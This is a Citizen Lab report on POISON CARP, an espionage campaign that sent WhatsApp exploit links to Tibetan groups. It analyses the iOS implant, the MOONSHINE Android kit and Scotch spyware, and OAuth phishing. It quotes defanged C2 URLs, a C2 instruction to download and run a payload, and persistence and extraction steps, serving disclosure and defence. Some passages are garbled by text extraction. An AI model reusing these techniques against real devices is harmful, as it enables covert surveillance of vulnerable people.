# Missing Link Tibetan Groups Targeted with 1-Click Mobile Exploits
**citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/**
[Research](https://citizenlab.ca/category/research/)
September 24, 2019
-----
[Targeted Threats](https://citizenlab.ca/category/research/targeted-threats/)
By [Bill Marczak,](https://citizenlab.ca/author/bmarczak/) [Adam Hulcoop,](https://citizenlab.ca/author/adam-hulcoop/) [Etienne Maynier,](https://citizenlab.ca/author/etiennemaynier/) [Bahr Abdul Razzak,](https://citizenlab.ca/author/bahrabdulrazzak/) [Masashi Crete-Nishihata,](https://citizenlab.ca/author/masashi/) [John Scott-Railton, and](https://citizenlab.ca/author/jsrailton/) [Ron Deibert](https://citizenlab.ca/author/profd/)
September 24, 2019
[Download this report](https://tspace.library.utoronto.ca/bitstream/1807/102535/1/Report%23123--missinglink.pdf)
## Key Findings
Between November 2018 and May 2019, senior members of Tibetan groups received malicious links in individually tailored WhatsApp
text exchanges with operators posing as NGO workers, journalists, and other fake personas. The links led to code designed to exploit
web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. This campaign
was carried out by what appears to be a single operator that we call POISON CARP.
We observed POISON CARP employing a total of eight Android browser exploits and one Android spyware kit, as well as one iOS exploit
chain and iOS spyware. None of the exploits that we observed were zero days. POISON CARP overlaps with two recently reported
campaigns against the Uyghur community. The iOS exploit and spyware we observed was used in watering hole attacks reported by
Google Project Zero, and a website used to serve exploits by POISON CARP was also observed in a campaign called “Evil Eye”
reported by Volexity. The Android malware used in the campaign is a fully featured spyware kit that has not been previously documented.
POISON CARP appears to have used Android browser exploits from a variety of sources. In one case, POISON CARP used a working
exploit publicly released by Exodus Intelligence for a Google Chrome bug that was fixed in source, but whose patch had not yet been
distributed to Chrome users. In other cases, POISON CARP used lightly modified versions of Chrome exploit code published on the
personal GitHub pages of a member of Qihoo 360’s Vulcan Team, a member of Tencent’s Xuanwu Lab, and by a Google Project Zero
member on the Chrome Bug Tracker.
This campaign is the first documented case of one-click mobile exploits used to target Tibetan groups, and reflects an escalation in the
sophistication of digital espionage threats targeting the community.
## Summary
[The Tibetan community has been besieged by digital espionage for over a decade. In 2009, the Information Warfare Monitor published the](https://isc.sans.edu/diary/Overview+of+cyber+attacks+against+Tibetan+communities/4177)
report [Tracking GhostNet, detailing a targeted malware operation that spied on Tibetan organisations including the Private Office of His](https://citizenlab.ca/2009/03/tracking-ghostnet-investigating-a-cyber-espionage-network/)
Holiness the Dalai Lama in Dharamsala, India, as well as government offices in 103 countries. At the time there were very few public reports of
targeted malware campaigns and limited documentation of how these threats affected civil society.
Over the past ten years, the tactics used in GhostNet have become familiar to Tibetans: emails laden with older exploits used to deliver custom
malware to unpatched computers. Typically, the malware used in these operations target Windows systems, with some rare incidents of
[malware targeting MacOS and](https://targetedthreats.net/media/2-Extended%20Analysis-Full.pdf) [Android. A common thread between these espionage campaigns is a focus on clever social engineering rather](https://citizenlab.ca/2013/04/permission-to-spy-an-analysis-of-android-malware-targeting-tibetans/)
than the technical sophistication of exploits or malware.
While these patterns are common, we have observed shifts in tactics seemingly tied to changes in the defensive posture of the community.
[Historically, malware sent as email attachments was the most common threat Tibetan groups experienced. In response, groups in the](https://www.usenix.org/conference/usenixsecurity14/technical-sessions/presentation/hardy)
community promoted a user awareness campaign that advised the use of cloud platforms, such as Google Drive or DropBox, to share
documents as an alternative to email attachments. Gradually, we observed a drop in malware campaigns against Tibetan groups and a rise in
credential phishing, suggesting that operators were changing their tactics in response. Recently, we have also observed campaigns using
[malicious OAuth applications, potentially in an effort to bypass users who are using two-factor authentication on their Google accounts. These](https://citizenlab.ca/2018/01/spying-on-a-budget-inside-a-phishing-operation-with-targets-in-the-tibetan-community/#part3)
changes demonstrate an inherent asymmetry between the digital defenses of Tibetan groups and the capabilities of the operators who target
them: changing the behaviour of a community is a slow and gradual process, while an adversary can evolve overnight.
[To address these challenges, Tibetan groups have recently formed the Tibetan Computer Emergency Readiness Team (TibCERT), a coalition](https://tibcert.org/)
between Tibetan organisations to improve digital security through incident response collaboration and data sharing. In November 2018,
TibCERT was notified of suspicious WhatsApp messages sent to senior members of Tibetan groups. With the consent of the targeted groups,
TibCERT shared samples of these messages with Citizen Lab. Our analysis found that the messages included links designed to exploit and
-----
sta spy a e o o e a d d o d de ces e ca pa g appea s to be ca ed out by a s g e ope ato t at e ca O SO C e
campaign is the first documented case of one-click mobile exploits used to target Tibetan groups. It represents a significant escalation in social
engineering tactics and technical sophistication compared to what we typically have observed being used against the Tibetan community.
Between November 2018 and September 2019, we collected one iOS exploit chain, one iOS spyware implant, eight distinct Android exploits,
and an Android spyware package. The iOS exploit chain only affects iOS versions between 11.0 and 11.4, and was not a [zero-day exploit](https://www.fireeye.com/current-threats/what-is-a-zero-day-exploit.html)
[when we observed it. The Android exploits include a working exploit publicly released by Exodus Intelligence for a Google Chrome bug that](https://blog.exodusintel.com/2019/04/03/a-window-of-opportunity/)
was patched, but whose patch had not yet been distributed to Chrome users. Other exploits include what appears to be lightly modified
[versions of Chrome exploit code published on the personal GitHub pages of a member of Tencent’s Xuanwu Lab (CVE-2016-1646), a member](https://github.com/4B5F5F4B/Exploits/blob/master/Chrome/CVE-2016-1646/exploit.html)
of [Qihoo 360’s Vulcan Team (CVE-2018-17480), and by a Google Project Zero member on the Chrome Bug Tracker (CVE-2018-6065).](https://github.com/xuechiyaobai/V8_November_2017/blob/e30af61fffe3aeee1aeab523bd5bef83d6a71044/CVE-2017-5070/hello_chrome.html)
The exploits, spyware, and infrastructure used by POISON CARP link it to two recently reported digital espionage campaigns targeting Uyghur
[groups. In August 2019, Google Project Zero reported on a digital espionage campaign identified by Google’s Threat Analysis Group that used](https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html)
compromised websites to serve iOS exploits (including a zero-day in one case) to visitors for the purpose of infecting their iPhones with
[spyware. Subsequent media](https://techcrunch.com/2019/08/31/china-google-iphone-uyghur/) [reporting cited anonymous sources who stated that the campaign targeted the Uyghur community and that the](https://www.forbes.com/sites/thomasbrewster/2019/09/01/iphone-hackers-caught-by-google-also-targeted-android-and-microsoft-windows-say-sources/#7f3cae244adf)
same websites were being used to serve Android and Windows malware.1 [Following these reports, Volexity published details of a digital](https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/)
espionage campaign against Uyghurs that used compromised websites to infect targets with Android malware. While Volexity did not provide
any technical indicators that overlap with Google’s report, they speculated that the operator may be the same in both cases. Our report
provides these missing links.
[POISON CARP used an iOS exploit chain identified in the Google Project Zero report, and used spyware that appears to be an earlier version](https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html)
[of the implant sample described by Google. POISON CARP used the domain](https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html) `msap[.]services to serve the iOS exploit, an indicator that`
[Volexity’s report found in the code of a compromised Uyghur website. Based on these similarities, it is likely the campaigns were conducted by](https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/)
the same operator, or a coordinated group of operators, who have an interest in the activities of ethinic minority groups that are considered
sensitive in the context of China’s security interests.
The report proceeds as follows:
In Section 1, we describe the social engineering tactics used to target the Tibetan community.
**Section 2 provides an overview of the iOS exploit and spyware used in the campaign and highlights similarities with the tool set**
described in the Google Project Zero report.
**Section 3 identifies the Android exploits and provides our analysis of the novel spyware payload used in the campaign.**
**Section 4 describes a malicious OAuth Application designed to gain access to Gmail accounts that was observed once in the campaign.**
Finally, we conclude in Section 5 with a discussion of the overlap between POISON CARP and the campaigns described by Google
Project Zero and Volexity. We also consider the significance of mobile threats for the digital security of the Tibetan community, and civil
society in general.
## 1. Targeting
[Between November 11-14, 2018, we observed 15 intrusion attempts against individuals from the Private Office of His Holiness the Dalai Lama,](https://www.dalailama.com/office)
the [Central Tibetan Administration, the](https://tibet.net/) [Tibetan Parliament, and Tibetan human rights groups. On April 22 and May 21 2019, we observed two](https://tibetanparliament.org/)
additional attempts. The majority of people who were targeted hold senior positions in their respective organizations.
The intrusion attempts arrived via WhatsApp messages from seven fake personas designed to appear as journalists, staff at international
advocacy organisations, volunteers to Tibetan human rights groups, and tourists to India. The fake personas exclusively used WhatsApp
phone numbers with Hong Kong country codes (+852).
Throughout the campaign, POISON CARP demonstrated significant effort in social engineering. The personas and messages were tailored to
the targets, and POISON CARP operators actively engaged in conversations and persistently attempted to infect targets. Overall, the ruse was
persuasive: in eight of the 15 intrusion attempts, the targeted persons recall clicking the exploit link. Fortunately, all of these individuals were
running non-vulnerable versions of iOS or Android, and were not infected.
## A Fake Amnesty International Researcher
On November 13, 2018, a senior staff member at a Tibetan human rights group was contacted on WhatsApp from a previously unknown
number. The persona claimed to be “Jason Wu,” head of the “Refugee Group” at Amnesty International’s Hong Kong branch. There does not
appear to be any “Jason Wu” currently employed by Amnesty International.
-----
Figure 1: A social engineering attempt on November 13, 2018 shows the level of effort put into crafting a plausible deception.
Once the target replied (Figure 1), the persona quickly introduced the topic of a recent self-immolation in Tibet and claimed to be attempting to
verify social media reports for use in an upcoming Amnesty International report on human rights in China, and for an upcoming statement
critical of the Chinese government’s treatment of ethnic minorities. Once the pretext was established, the operator shared a link shortened with
```
bit.ly . The link redirected to a page on www.msap[.]services that contained an iOS exploit chain targeted at versions 11.0 through 11.4.
```
The target recalls clicking on the link, but was not infected because their iPhone was running iOS version 12.0.1. Perhaps because the
operator did not observe a successful infection, they continued to converse with the target (Figure 2), sharing additional exploit links. Several
hours later, the persona explained that they had confirmed information about the self-immolation with contacts at the Central Tibetan
Administration, which may have been an effort to make the interaction seem benign to the target.
Figure 2: The fake “Jason Wu” persona send exploits links to a staff member of a Tibetan human rights group.
## From iOS to Android Exploit Attempts
In another intrusion attempt, a staff member from the same Tibetan human rights organization was contacted by “Lucy Leung,” a persona
masquerading as a New York Times reporter seeking an interview. After a brief pretext, the persona sent the target an iOS intrusion attempt
linking directly to `www.msap[.]services (Figure 3).`
-----
Figure 3: After sending an iOS exploit link (left), the fake New York Times reporter persona sends an Android exploit link (right).
The persona persistently requested that the target click the link. The target recalls clicking on the link, but they were not infected as they were
using an Android device. The persona then sent an Android exploit link, this time disguising it via `bit.ly .`
## 2. iOS Exploit Kit
Of the 17 intrusion attempts we observed against Tibetan targets, 12 contained links to the iOS exploit. All but one of the attempts were sent
between November 11-14, 2018, with the last attempt sent on April 22, 2019. The exploit links pointed to what appear to be unique shortcodes
on `www.msap[.]services (e.g.,` `http://www.msap[.]services/ZQfqzs ). Links were sometimes sent directly, and sometimes via URL`
shorteners such as Bitly.
Requesting a malicious link hosted on the `www.msap[.]services domain using an iPhone User-Agent string (iOS 11.0 – 11.4) returned a`
valid html page including two iframes: one full-sized iframe displaying a benign decoy webpage and an invisible iframe leading to an exploit
page on a different website. Attempts to visit with other user agents we tested resulted in a 302 redirect to the decoy webpage. Attempts to
visit nonexistent short-links on the `www.msap[.]services domain resulted in a 302 redirect of the target’s browser to` `apple.com .`
As of September 6, 2019, the Bitly link statistics recorded 140 total clicks on the iOS exploit short links. We obtained a single iOS exploit chain
from the links sent in November 2018. We were unable to obtain any malicious code from the April 2019 link. The exploit chain appeared to be
designed to target iOS versions 11 – 11.4 on all iPhone models 6 – X, although we were unable to successfully infect an iPhone SE running
iOS 11.4 during testing. The first exploit in the chain was a WebKit JavaScriptCore exploit, which resulted in the loading of an iOS privilege
escalation exploit chain that ultimately executed a spyware payload designed to steal data from a range of applications and services.
We reported the exploit chain to Apple shortly after discovering it in November 2018. Apple confirmed that both the browser and privilege
escalation exploits had been patched as of iOS 11.4.1 in July 2018. The browser exploit used in the POISON CARP campaign appeared to
[match an exploit described in the Google Project Zero report (JSC Exploit 4, related to WebKit issue](https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html) [185694). Apple further confirmed that the](https://bugs.webkit.org/show_bug.cgi?id=185694)
[privilege escalation and sandbox escape exploit we encountered was identical to iOS Exploit Chain 3 from the Google report. Therefore, when](https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-3.html)
the exploit was deployed against Tibetan groups, it was not a zero-day and was at least four months out-of-date.
## Encrypted Malcode Delivery
[One noteworthy feature of the exploitation process was that the exploits and malcode were encrypted with an ECC Diffie-Hellman (ECDH) key](https://en.wikipedia.org/wiki/Elliptic-curve_Diffie%E2%80%93Hellman)
exchange between the target browser and the operator’s server (Figure 4). The encrypted delivery of the exploit and payload would prevent a
network intrusion detection system (such as those commonly used in enterprise settings) from detecting malicious code, and prevents analysts
-----
o eco st uct g a d a a y g t e a c ous code o a et o t a c captu e a o e O cou se, a a ysts ca st e t act t e a c ous
code in other ways, such as from memory dumps or browser-based instrumentation.
Figure 4 : ECDH key generation for protection of the iOS malcode.
[The specific code for encrypted malcode delivery used by POISON CARP is based on a project called IronSquirrel developed by security](https://github.com/MRGEffitas/Ironsquirrel)
[researcher Zoltan Balazs in 2017. However, the use of encrypted malcode delivery was first seen in 2015 in the Angler Exploit Kit and later in](https://securelist.com/attacking-diffie-hellman-protocol-implementation-in-the-angler-exploit-kit/72097/)
several [other kits.](https://blog.trendmicro.com/trendlabs-security-intelligence/astrum-exploit-kit-abuses-diffie-hellman-key-exchange/)
## Implant Analysis
[The spyware implant we acquired from the exploit chain in November 2018 was similar, though not identical, to the implant described by](https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html)
Google Project Zero researchers. Based on the technical details provided in the Google report, we believe the two implants represent the
same spyware program in different stages of development. The November 2018 version we obtained appears to represent a rudimentary
stage of development: seemingly important methods that are unused, and the command and control (C2) implementation lacks even the most
[basic capabilities. The Implant Teardown section of the Google Project Zero report shows a fairly full-featured implant. We highlight some](https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html)
differences between the two samples below.
### Initialisation
The main functionality of the implant is implemented in the `Service class. The class` `start method (Figure 5) initialises a timer using the`
```
startTimer method to create a persistent execution loop.
```
Figure 5: Service:start method.
Once complete, the `start method carries out initial device information collection and upload to the C2 server, followed by collection and`
upload of various application data including location data, contacts, call history, SMS history, and more.
**IMPLANT COMPARISON: start method**
-----
e sta t et od t e p a t t at Goog e oject e o esea c e s a a y ed ( c e e e to as t e 0 e s o ) ad t e o o g
structure:
```
-[Service start] {
[self startTimer];
[self upload];
}
```
In this version, the initial device information collection takes place in the upload method, making the start method much simpler. The P0
version also appears to add a data retrieval method to obtain the contents of the Apple Mail application, something which is not found in the
version we analyzed.
The specific device information gathered during the implant initialisation, executed by the uploadDevice method, consists of:
iPhone model
iPhone name
iPhone serial number
iOS Version
Phone number
ICCID of the SIM Card
IMEI of the device
Network connection method (wifi or cellular)
**IMPLANT COMPARISON: data collection**
In the P0 version, the same device info was collected via the `uploadDevice method, however this version also collected two additional`
pieces of information:
Total disk space
Free disk space
During initial data collection and exfiltration, the implant contacts the C2 server using the `remotelist method to request a list of applications`
from which the operator wishes to exfiltrate data. In the case where no list is returned, the implant has a predefined list of hardcoded
applications which consists of:
Viber (com.viber)
Voxer (com.rebelvox.voxer-lite)
Telegraph (ph.telegra.Telegraph)
Gmail (com.google.Gmail)
Twitter (com.atebits.Tweetie2)
QQMail (com.tencent.qqmail)
WhatsApp (net.whatsapp.WhatsApp)
**IMPLANT COMPARISON: targeted applications**
The P0 version adds the following applications to the default list:
Yahoo Mail (com.yahoo.Aerogram)
Outlook (com.microsoft.Office.Outlook)
NetEase Mail Master (com.netease.mailmaster)
Skype (com.skype.skype)
Facebook (com.facebook.Facebook)
WeChat (com.tencent.xin)
### Command and (Lack of) Control
Once the persistence timer takes control of the run loop, two methods are called: `status and` `capp (Figure 6).`
-----
Figure 6: Run loop timer.
The `status method sends a heartbeat message to the C2 server containing the current network connection method (wifi or cellular).`
Knowing whether the target is on wifi or cellular is important to operators, as exfiltrating large amounts of data using a cellular connection could
tip off the target to the surveillance if they receive a data overage alert from their provider. Figure 7 shows the `status method.`
Figure 7: Service:status method.
In our sample, this data is sent via (unencrypted) HTTP POST to a C2 server at `hxxp://66.42.58[.]59:9078/status .`
The other method called by the timer loop, `capp (Figure 8), issues a request to the C2 server, again using the` `remotelist method, to`
request a list of applications from which the operator wishes to exfiltrate data.
Figure 8: capp method.
The `remotelist method makes a call via HTTP POST, again unencrypted, to` `hxxp://66.42.58[.]59:9078/list . In our sample, this is`
the only function that the C2 server can utilise.
**IMPLANT COMPARISON: command and control**
In the P0 version of the implant, the `timer handle method has a similar structure, however the` `capp method is renamed to` `cmds :`
-----
```
NSLog(@"cmds");
[self remotelist];
NSLog(@"finally");
}
```
The P0 version of the `remotelist method is significantly improved, and able to parse and handle a variety of commands from the command`
and control server:
[snip]
```
data_obj = [json objectForKey:@"data"];
NSLog(@"data Result: %@", data_obj);
cmds_obj = [data_obj objectForKey:@"cmds"];
NSLog(@"cmds: %@", cmds_obj);
for (cmd in cmds_obj) {
[self doCommand:cmd];
}
```
The P0 version passes received commands to the doCommand method, which is ultimately responsible for dispatching various data collection
and exfiltration methods depending on the options chosen by the malware operator. A complete list of the commands available to the operator
[are documented in the Google Project Zero report.](https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html)
### Summary
We suspect that the implant we observed is in a rudimentary state of development, due to the seeming lack of C2 server communication
capabilities. There are numerous methods which appear, both in name and function, to have been designed to capture and exfiltrate specific
device and application data. While they are called on the initial execution of the implant via the start method, they are not called again via any
interaction from the C2 server. Additionally, there are numerous utility methods with suggestive names that are never invoked:
```
[Util:pathOfWhatsappData]
[Util:pathOfWhatsappGroup]
[Util:pathOfTwitterData]
[Util:pathOfProtonMailData]
[Util:pathOfProtonMailGroup]
```
Given the enhancements in the implant version analyzed by the Google Project Zero team, we strongly suspect that our copy of the implant
represents an earlier stage of development.
## 3. MOONSHINE: Android Exploit Kit and Payload
During the course of the campaign, POISON CARP sent targets four malicious links pointing to Android exploits via WhatsApp. While we did
not identify any shared infrastructure or code similarities between the iOS and Android exploits or payloads, it is clear that POISON CARP was
using both tools (Figure 3). We refer to the Android exploit and malware kit as MOONSHINE, given a number of Alcohol-related strings
included by the developer. This kit has not been publicly described previous to this report.
The Android exploit links were links of the following form, where [MoonshineSite] was an IP address or domain name of a server running
MOONSHINE, and [URL] was a Base64-encoded decoy URL where the user was redirected post-exploitation, or if exploitation failed:
```
hxxp://[MoonshineSite]:5000/web/info?org=[URL]
```
If a target accessed the link using a Chrome-based Android browser, they received a webpage with the code in Figure 9, designed to coerce
their device to open the exploit URL inside the Facebook app’s built-in Chrome-based web browser.
-----
```
```
**Figure 9: JavaScript attempts to force the URL to be opened in the Facebook app.**
When the exploit URL was opened with an Android Facebook User-Agent header, MOONSHINE checked the header to see if the Chrome
version was vulnerable to one of eight different Chrome exploits (Table 1), which are all fixed in the latest Chrome version. Four of the
MOONSHINE exploits are clearly copied from working exploit code posted by security researchers on bug trackers or GitHub pages. In
contrast to the iOS exploit architecture, the Android exploit and payload delivery was not encrypted with ECDH keys (or even HTTPS).
**User**
**Agent in**
**Request** **Exploit Returned**
Chrome
< 38
Chrome
39 – 40
Chrome
41
Chrome
42 – 49
Chrome
50
Chrome
51 – 55
Chrome
56 – 58
Chrome
59 – 61
Chrome
62 – 63
Chrome
64 – 67
Chrome
68 – 69
Chrome
70
Chrome
71-73
(None)
**[Exploit #1: Appears to include a CVE-2016-1646 exploit published on Kai Kang’s Github account (@4B5F5F4B) of Tencent’s](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1646)**
Xuanwu Lab.2
(None)
**Exploit #1**
**[Exploit #2: Appears to be CVE-2016-5198, a bug](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5198)** [publicly credited to Tencent’s Keen Security Lab via Trend Micro’s Zero Day](https://chromereleases.googleblog.com/2016/11/stable-channel-update-for-desktop.html)
Initiative and fixed in Chrome 54.0.2840.87. The author of the specific exploit used here is unknown, though there is substantial
code overlap with Exploit #1.
**[Exploit #3: Appears to be CVE-2017-5030, a bug publicly credited to security researcher Brendon Tiszka. The author of the](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5030)**
specific exploit used here is unknown.
**[Exploit #4: Appears to include a CVE-2017-5070 exploit published on Qixun Zhao’s Github account (@S0rryMybad) of Qihoo](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5070)**
360’s Vulcan Team.
(None)
**[Exploit #5: Appears to include a CVE-2018-6065 exploit published on the Google Chrome bug tracker by Mark Brand of Google](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6065)**
Project Zero.
(None)
**[Exploit #6: Appears to be CVE-2018-17463, a bug publicly credited to security researcher Samuel Groß. The author of the](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17463)**
specific exploit used here is unknown.
**[Exploit #7: Appears to be CVE-2018-17480, a bug successfully exploited at the Tian Fu Cup PWN Contest. The bug is credited](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17480)**
to Guang Gong (@oldfresher) of Qihoo 360’s Alpha Team, though the author of the specific exploit used here is unknown.
**Exploit #8: Appears to be CVE-2019-5825, a bug publicly credited to several researchers at Tencent’s Keen Security Lab. The**
[specific exploit used here was written and published by Exodus Intelligence after they examined the git log for Chrome’s](https://blog.exodusintel.com/2019/04/03/a-window-of-opportunity/)
JavaScript engine, and found a vulnerability that had been fixed in source code, but whose patch had not yet shipped to Chrome
users.
**Table 1: Chrome Exploits used in MOONSHINE**
Each exploit ran the same shellcode, which downloaded an ARMv7 ELF binary file (which we call the Loader) from
```
hxxp://[MoonshineSite]:5000/dev/loader, and stored the binary in the Facebook app folder as
```
(/data/data/com.facebook.katana/[BinaryName]), where [BinaryName] is a random alphanumeric string. The shellcode then executed the
-----
oade, pass g `ttp //[ oo s` `eS te] 5000/ a d /data/data/co` `aceboo` `ata a/[` `a y a e] as a gu` e ts
We also tried fetching the exploits using an Android User-Agent for Facebook Messenger. In that case, everything was the same, except the
Loader was downloaded to the Facebook Messenger app folder ( /data/data/com.facebook.orca/[BinaryName] ), and this path was
passed by the shellcode as the second argument to the Loader.
## Android Implant Overview
The MOONSHINE Loader was the first in a series of intermediary staged malware binaries sequentially executed to deliver the ultimate
payload: a fully featured Android spyware package called “Scotch” by its developers. Figure 10 provides an overview of the installation
process.
MOONSHINE is designed for stealthy rootless operation, by exploiting popular legitimate Android apps with built-in browsers that request
sensitive permissions. MOONSHINE obtains persistence by overwriting an infrequently used shared library (.so) file in one of these apps with
itself. When a targeted user opens the legitimate app after exploitation, the app loads the shared library into memory, which causes the
spyware to activate. While code in subsequent stages of MOONSHINE suggests that it can be deployed against four apps (Facebook,
Facebook Messenger, WeChat, and QQ), the exploit site we tested against did not deliver any exploits for WeChat or QQ User-Agent headers.
The ultimate spyware tool deployed by MOONSHINE, Scotch, is a modular Java application which uses the WebSocket protocol to
communicate with its C2 server. The Scotch payload itself has limited espionage features, such as obtaining device information and uploading
files from the infected device. However, as part of its initial contact with the C2, Scotch downloads additional plugins. During our analysis, we
were able to acquire two plugin packages, named “Bourbon.jar” and “IceCube.jar” which added functionality including exfiltrating SMS text
messages, address books, and call logs, and spying on the target through their phone’s camera, microphone, and GPS.
## Loader Stage
After the MOONSHINE Loader is installed, the Loader POSTs a check-in message to the C2 server using the path:
```
hxxp://[MoonshineSite]:5000/dev/loader/post .
```
The C2 server response provides instructions to the Loader, including a URL from which to download and execute the next stage of the
malware chain (tdu= parameter), as well as a series of files to delete from the app folder (cf= parameter), which may be generated in certain
circumstances by different invocations of the Loader. When we POSTed a check-in message to a C2, we received the following instructions:
```
LD&l=/data/data/com.facebook.katana;rs=0;lf=;tdu=http://[MoonshineSite]:5000/im/lure;tn=.lure;cf=excit,s.r.zip,busybox,
debug.apk,.lure,libNetwork.so,report,;
```
The instructions cause the Loader to download /im/lure into the Facebook app folder, and execute it. This binary was an ARMv7 ELF binary
that the developers refer to as Whisky based on strings in the binary.
-----
Figure 10: Multistage installation of the MOONSHINE spyware kit.
## Whisky Stage
Whisky’s first step is to determine which shared library (.so) file should be overwritten by the next stage of MOONSHINE — called “Bourbon”
by developers — by determining the current application context from the current working directory (Table 2). If Whisky happens to be running
as the root user on the Android device, then the target filename used is `/data/local/tmp/libbourbon.so .`
**If current application is …** **Then write to this shared library filename:**
```
com.facebook.katana (Facebook) /data/data/com.facebook.katana/lib-xzs/libaborthooks.so
com.facebook.orca (Facebook /data/data/com.facebook.orca/lib-xzs/liblog.so
```
Messenger)
```
com.tencent.mm (WeChat) /data/data/com.tencent.mm/app_tbs/core_share/libwebp_base.so
com.tencent.mobileqq (QQ) /data/data/com.tencent.mobileqq/files/TencentVideoKit/armeabi/libckeygenerator.so
```
**Table 2: Application context to destination filename map.**
These destination filenames are chosen intentionally, and act as a method of persistence and covert execution. In the case of Facebook and
Facebook Messenger, the shared library files in Table 2 are loaded when the apps start. After determining the destination filename, Whisky
extracts Bourbon by following these high level steps:
1. Determine the size, s, of the encrypted data chunk using the last 4 bytes of the file (Figure 11).
[2. Read an XXTEA encryption key, k, from the 16 bytes preceding s.](https://en.wikipedia.org/wiki/XXTEA)
3. Read the MD5 hash, m, of the encrypted data chunk from the 32 bytes preceding k.
4. Extract s bytes preceding m, to obtain the encrypted Bourbon binary.
5. Validate that the MD5 hash of the encrypted Bourbon binary matches m.
6. Decrypt the binary using XXTEA algorithm with key k, to obtain the final Bourbon binary.
-----
Figure 11: The XXTEA key, MD5 hash, and file size stored in Whisky.
## Bourbon Stage
When a user opens the app that Bourbon has been implanted inside, e.g., Facebook, the
App loads the Bourbon library into the Android Runtime, which calls Bourbon’s _[JNI_Onload method. The JNI_Onload method in Bourbon](https://docs.oracle.com/javase/8/docs/technotes/guides/jni/spec/invocation.html#JNJI_OnLoad)_
extracts the next payload, named “Scotch”, from itself using the extractScotch method (Figure 12). The method takes the following steps:
1. Determine the C2 server IP address, x, by converting the last 4 bytes of the Bourbon binary to decimal.
2. Extract the size, s, of the Scotch payload from the 4 bytes preceding x.
3. Read the MD5 hash, m, of the Scotch binary from the 32 bytes preceding s.>
4. Extract s bytes preceding m, to obtain the Scotch payload.
5. Validate that the MD5 hash of the extracted Scotch binary matches m.
6. Create an instance of the `com.sec.whisky.Scotch class, passing the IP address x as an argument to the constructor.`
Figure 12: The extractScotch method from the Bourbon binary.
The Scotch implant is written to disk in the directory for the app that Bourbon was implanted in, for example:
```
/data/data/com.facebook.katana/app_sikhywis_ca55200e/scotch.jar .
## Scotch Stage
```
The Scotch stage is the final implant, providing an extensible, persistent spyware tool. Upon loading, the Scotch implant generates two
identifiers: a `Whisky_ID, generated by taking the SHA256 hash of a random UUID value, and a` `Device_ID, constructed by taking the`
SHA256 hash of a fingerprint string comprised of various values specific to the infected device. The implant then makes a connection to port
[10011 on the C2 server using the WebSocket protocol, thereby allowing bi-directional communication between the implant and the C2 server.](https://en.wikipedia.org/wiki/WebSocket)
Using this WebSocket connection, Scotch sends an initial check-in message to the C2 server at the following URL:
```
ws://[MoonshineSite]:10011/ws?whisky_id=[sha256]&device_id=[sha256]&error=0 .
```
Scotch provides some basic espionage capabilities out of the box, but it downloads plugins from the C2 server to augment its functionality. The
basic C2 commands available in Scotch’s initial state are:
DEV_INFO: Get detailed information on the device (SIM Card information, hardware, sensors)
GET_FILE: Upload a file from the phone
GET_PLUGIN_INFO: Install additional plugins
When we infected our test device with Scotch, it was immediately updated with two new plugin bundles in DEX format: `Bourbon.jar and`
```
IceCube.jar . The Bourbon.jar plugin package added the following functionality:
```
-----
G _C OG ac p o e ca s ece ed by t e p o e
GET_CONTACT: List and track contacts added on the phone
GET_FILE: A more advanced version of the built-in GET_FILE command to upload and download files
GET_LOCATION: Track the phone’s location, including through GPS
GET_SMS: Track SMS messages received by the phone
The IceCube.jar plugin package added further functionality:
CAMERA: List available cameras and take pictures
NOTIFICATION: Show a notification on the phone
RECORD: Record audio from the microphone
SCREEN_SNAP: Take screenshots
SHELL: Execute a shell command
The implant and C2 communicated using JSON formatted messages which were compressed using GZIP and then Base64 encoded prior to
transmission via WebSocket. After capturing network traffic between our infected device and the C2 server, we were able to decode and
observe the communication pattern. An example of this traffic is provided in Appendix A.
During analysis of MOONSHINE websites, we discovered two distinct login pages that may be used to manage implants and exploits.
Screenshots of these interfaces are shown in Figure 13. ScotchManager was hosted on port 9090, and VodkaManager was hosted on port
8080.
Figure 13: Suspected MOONSHINE management interfaces.
Although one of these panels carries the name VodkaManager, we did not uncover any specific module or component of MOONSHINE that
used the name “Vodka”.
## Summary
We believe that the discovery of this Android exploit and spyware kit we dubbed MOONSHINE represents a previously undocumented
espionage tool. Its multi-stage installation approach along with its persistence via shared object library hijacking both suggest a high degree of
operational security awareness and skilled development.
## 4. Malicious OAuth Application
[Open Authentication (OAuth) is a protocol designed for access delegation and has become a popular way for major platforms (e.g., Facebook,](https://en.wikipedia.org/wiki/OAuth)
Google, Twitter, etc.) to permit sharing of account information with third party applications.
[Malicious OAuth applications have been used in phishing attacks both in digital espionage operations and generic cybercrime. Recently, we](https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/)
[have also seen campaigns using malicious OAuth applications targeting the Tibetan community, perhaps in an effort to phish users who take](https://citizenlab.ca/2018/01/spying-on-a-budget-inside-a-phishing-operation-with-targets-in-the-tibetan-community/#part3)
advantage of two-factor authentication to secure their Google accounts.
On May 31, 2019, a member of the Tibetan Parliament received a WhatsApp message requesting confirmation of a news story (Figure 14).
The same individual previously was sent iOS exploit links in a WhatsApp message in November 2018. The message included two Bitly links.
The first short link sent in the message extended to `hxxps://www.energy-mail[.]org/B20V54, which redirected to a Google OAuth`
